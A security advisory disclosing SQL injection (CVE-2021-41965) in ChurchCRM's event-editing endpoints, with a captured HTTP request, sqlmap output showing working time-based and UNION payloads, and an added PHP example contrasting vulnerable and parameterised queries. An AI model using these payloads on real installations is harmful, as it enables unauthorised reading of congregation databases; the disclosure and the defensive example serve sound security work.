SQL Injection Vulnerability in ChurchCRM (CVE-2021-41965)

Summary

Product:                   Church Web CRM
Manufacturer:              ChurchCRM
Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
Tested Version(s):         4.4.5
Vulnerability Type:        SQL Injection (CWE-89) 
Risk Level:                High
Solution Status:           Unfixed
Manufacturer Notification: 2021-09-16
Solution Date:             n/a
Public Disclosure:         2022-05-14
CVE Reference:             CVE-2021-41965
Author of Advisory:        Alexander Bilz

Overview

The manufacturer describes the product as follows (see [1]):

“An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and to managing a congregation. Among other things, it allows users to:

  • Conduct Fundraisers
  • Manage Church Members
  • Publish Events
  • Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account [2].

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

Vulnerability Details

ChurchCRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created, it can also be edited and deleted through the events page.

The EID parameter, which is sent along when an existing entry is edited, was found to be susceptible to SQL injection. On edit, the data is posted to EventEditor.php, where it is used in a query executed against the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php endpoint and the ID parameter of the EventNames.php endpoint can be abused to inject arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

  • Boolean-based blind
  • Time-based blind

The vulnerable functionality is only accessible when authenticated.
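To make the root cause and the fix concrete, the following is an added illustrative example, not code from ChurchCRM or from the author of this advisory. It contrasts the pattern the advisory describes (a request parameter concatenated straight into the SQL string, with no validation) against a hardened lookup that validates the type and binds the value as a prepared-statement parameter. The table name event_types, the row data and the use of an in-memory SQLite database via PDO are assumptions made so the script runs offline; ChurchCRM itself runs on MySQL/MariaDB.

```php
<?php
// Added example (not ChurchCRM's code). Assumes PHP with the PDO SQLite driver.
// The hypothetical table `event_types` stands in for whatever the real endpoint queries.

function buildDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE event_types (id INTEGER PRIMARY KEY, name TEXT)');
    $ins = $db->prepare('INSERT INTO event_types (id, name) VALUES (?, ?)');
    // Constructed sample rows.
    foreach ([[1, 'Service'], [2, 'Sunday School'], [4, 'Summer Camp']] as $row) {
        $ins->execute($row);
    }
    return $db;
}

// VULNERABLE: the request parameter is interpolated into the SQL text, so a value
// containing a quote can change the structure of the query (the advisory's root cause).
function lookupVulnerable(PDO $db, string $enTyid): array {
    $sql = "SELECT id, name FROM event_types WHERE id = '" . $enTyid . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: reject anything that is not an integer id, then bind the value as a
// parameter so the database never interprets it as SQL.
function lookupHardened(PDO $db, string $enTyid): array {
    if (filter_var($enTyid, FILTER_VALIDATE_INT) === false) {
        throw new InvalidArgumentException('EN_tyid must be an integer');
    }
    $stmt = $db->prepare('SELECT id, name FROM event_types WHERE id = :id');
    $stmt->execute([':id' => (int) $enTyid]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = buildDb();
$benign   = '4';
$tampered = "4' OR '1'='1";   // constructed boolean-based payload for the demonstration

// The vulnerable lookup returns every row for the tampered input; the hardened lookup
// returns only the requested row for benign input and refuses the tampered one.
printf("vulnerable, benign:   %d row(s)\n", count(lookupVulnerable($db, $benign)));
printf("vulnerable, tampered: %d row(s)\n", count(lookupVulnerable($db, $tampered)));
printf("hardened,   benign:   %d row(s)\n", count(lookupHardened($db, $benign)));
try {
    lookupHardened($db, $tampered);
} catch (InvalidArgumentException $e) {
    echo "hardened,   tampered: rejected (" . $e->getMessage() . ")\n";
}
```

Run it with `php example.php`. The type check alone would already stop the payloads shown later in the sqlmap output, but the prepared statement is the actual control: even a parameter that legitimately carries free text (an event name, say) stays data rather than becoming part of the query.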

Proof of Concept (PoC)

As a proof of concept, the EN_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap [3].

Let’s start with the HTTP request I had captured in Burp Suite.

POST /churchcrm/EditEventTypes.php HTTP/1.1
Host: <IP>
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<IP>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<IP>/churchcrm/EventNames.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <Cookie Value>
Connection: close

EN_tyid=4&Action=Edit

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

┌──(kali㉿kali)-[~/ChurchCRM] 
└─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
        ___ 
       __H__                                                                  
 ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
|_ -| . [.]     | .'| . |                                                     
|___|_  [)]_|_|_|__,|  _|                                                     
      |_|V...       |_|   http://sqlmap.org                                   
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
[*] starting @ 10:42:27 /2021-09-16/ 
[10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
[10:42:28] [INFO] resuming back-end DBMS 'mysql'  
[10:42:28] [INFO] testing connection to the target URL 
sqlmap resumed the following injection point(s) from stored session: 
--- 
Parameter: EN_tyid (POST) 
    Type: time-based blind 
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
    Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
    Type: UNION query 
    Title: Generic UNION query (NULL) - 9 columns 
    Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
--- 
[10:42:29] [INFO] the back-end DBMS is MySQL 
web application technology: Apache 2.4.48, PHP 7.3.30 
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
[10:42:29] [INFO] fetching database names 
[10:42:31] [INFO] retrieved: 'information_schema' 
[10:42:32] [INFO] retrieved: 'test' 
[10:42:33] [INFO] retrieved: 'churchcrm' 
available databases [3]:                                                     
[*] churchcrm 
[*] information_schema 
[*] test 
[10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
[*] ending @ 10:42:33 /2021-09-16/

Disclosure Timeline

I immediately reached out to the vendor via email on 2021-09-16, but they never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

  • 2021-09-16: Vulnerability discovered
  • 2021-09-16: Vulnerability reported to the manufacturer
  • 2022-05-02: CVE has been reserved
  • 2022-05-14: Public disclosure of the vulnerability

Credits

This security vulnerability was found by Alexander Bilz.

Disclaimer

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

References

  1. Product website for ChurchCRM: http://churchcrm.io/
  2. ChurchCRM CRM source code: https://github.com/ChurchCRM/CRM
  3. sqlmap: https://sqlmap.org/